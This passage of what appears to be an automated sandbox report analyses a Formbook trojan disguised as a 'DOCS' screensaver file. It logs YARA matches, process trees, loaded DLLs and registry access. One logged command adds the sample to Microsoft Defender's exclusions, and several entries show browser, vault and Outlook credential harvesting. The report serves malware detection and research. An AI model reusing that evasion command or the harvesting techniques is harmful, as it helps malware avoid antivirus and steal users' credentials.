                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04B868B86_2_04B868B8
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BCE8F06_2_04BCE8F0
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BA38E06_2_04BA38E0
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04C0D8006_2_04C0D800
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BAA8406_2_04BAA840
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BA28406_2_04BA2840
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BA29A06_2_04BA29A0
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04C6A9A66_2_04C6A9A6
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BB69626_2_04BB6962
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BA99506_2_04BA9950
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BBB9506_2_04BBB950
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04C4DAC66_2_04C4DAC6
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BE5AA06_2_04BE5AA0
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04B9EA806_2_04B9EA80
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04C3DAAC6_2_04C3DAAC
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04C57A466_2_04C57A46
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04C5FA496_2_04C5FA49
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04C13A6C6_2_04C13A6C
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04C56BD76_2_04C56BD7
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BBFB806_2_04BBFB80
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BDDBF96_2_04BDDBF9
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04C5AB406_2_04C5AB40
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04C5FB766_2_04C5FB76
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_00C619706_2_00C61970
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_00C650006_2_00C65000
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_00C631DD6_2_00C631DD
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_00C631E06_2_00C631E0
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_00C7B5206_2_00C7B520
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_00C5C8976_2_00C5C897
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_00C5C8A06_2_00C5C8A0
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_00C5CAC06_2_00C5CAC0
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_00C5AB406_2_00C5AB40
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04A6E4266_2_04A6E426
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04A6E7BC6_2_04A6E7BC
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04A6D7F36_2_04A6D7F3
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04A6E3056_2_04A6E305
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04A6D8286_2_04A6D828
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04A6CAB96_2_04A6CAB9
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04A6CAC56_2_04A6CAC5
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04A6CAC06_2_04A6CAC0
                Source: C:\Windows\SysWOW64\control.exeCode function: String function: 04C1F290 appears 103 times
                Source: C:\Windows\SysWOW64\control.exeCode function: String function: 04BD5130 appears 36 times
                Source: C:\Windows\SysWOW64\control.exeCode function: String function: 04BE7E54 appears 86 times
                Source: C:\Windows\SysWOW64\control.exeCode function: String function: 04B8B970 appears 250 times
                Source: C:\Windows\SysWOW64\control.exeCode function: String function: 04C0EA12 appears 86 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 05615130 appears 58 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 0564EA12 appears 86 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 0565F290 appears 103 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 055CB970 appears 259 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 05627E54 appears 107 times
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1720344502.00000000044BD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs PASU5160894680 DOCS.scr.exe
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1717296789.00000000033C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameGB-lesson-forms.dll@ vs PASU5160894680 DOCS.scr.exe
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1710175136.000000000165E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PASU5160894680 DOCS.scr.exe
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1721562024.0000000005910000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameGB-lesson-forms.dll@ vs PASU5160894680 DOCS.scr.exe
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1723689341.0000000007CD0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs PASU5160894680 DOCS.scr.exe
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000000.1664531081.0000000000FB2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameHIPO.exe@ vs PASU5160894680 DOCS.scr.exe
                Source: PASU5160894680 DOCS.scr.exeBinary or memory string: OriginalFilenameHIPO.exe@ vs PASU5160894680 DOCS.scr.exe
                Source: PASU5160894680 DOCS.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000004.00000002.1846379339.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000006.00000002.4133191097.0000000004910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000006.00000002.4133252340.0000000004960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000004.00000002.1846811096.0000000004D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000004.00000002.1848370775.0000000006CF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: PASU5160894680 DOCS.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.PASU5160894680 DOCS.scr.exe.46845e0.2.raw.unpack, JOPHjjJP1DReOpDY0L.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PASU5160894680 DOCS.scr.exe.7cd0000.4.raw.unpack, n5o3CtEHtQcW8gVMs0.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.PASU5160894680 DOCS.scr.exe.7cd0000.4.raw.unpack, n5o3CtEHtQcW8gVMs0.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PASU5160894680 DOCS.scr.exe.7cd0000.4.raw.unpack, n5o3CtEHtQcW8gVMs0.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.PASU5160894680 DOCS.scr.exe.45fcfc0.1.raw.unpack, JOPHjjJP1DReOpDY0L.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PASU5160894680 DOCS.scr.exe.45fcfc0.1.raw.unpack, n5o3CtEHtQcW8gVMs0.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.PASU5160894680 DOCS.scr.exe.45fcfc0.1.raw.unpack, n5o3CtEHtQcW8gVMs0.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PASU5160894680 DOCS.scr.exe.45fcfc0.1.raw.unpack, n5o3CtEHtQcW8gVMs0.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.PASU5160894680 DOCS.scr.exe.46845e0.2.raw.unpack, n5o3CtEHtQcW8gVMs0.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.PASU5160894680 DOCS.scr.exe.46845e0.2.raw.unpack, n5o3CtEHtQcW8gVMs0.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PASU5160894680 DOCS.scr.exe.46845e0.2.raw.unpack, n5o3CtEHtQcW8gVMs0.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.PASU5160894680 DOCS.scr.exe.7cd0000.4.raw.unpack, JOPHjjJP1DReOpDY0L.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/7@19/11
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PASU5160894680 DOCS.scr.exe.logJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeMutant created: \Sessions\1\BaseNamedObjects\rpXhDySUSsBcArb
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7536:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1u5akofx.tei.ps1Jump to behavior
                Source: PASU5160894680 DOCS.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: PASU5160894680 DOCS.scr.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: control.exe, 00000006.00000003.2023994663.0000000002FBA000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000006.00000002.4132398440.0000000002FBA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: PASU5160894680 DOCS.scr.exeReversingLabs: Detection: 31%
                Source: unknownProcess created: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe "C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe"
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeProcess created: C:\Windows\SysWOW64\control.exe "C:\Windows\SysWOW64\control.exe"
                Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe"Jump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"Jump to behavior
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeProcess created: C:\Windows\SysWOW64\control.exe "C:\Windows\SysWOW64\control.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: PASU5160894680 DOCS.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: PASU5160894680 DOCS.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
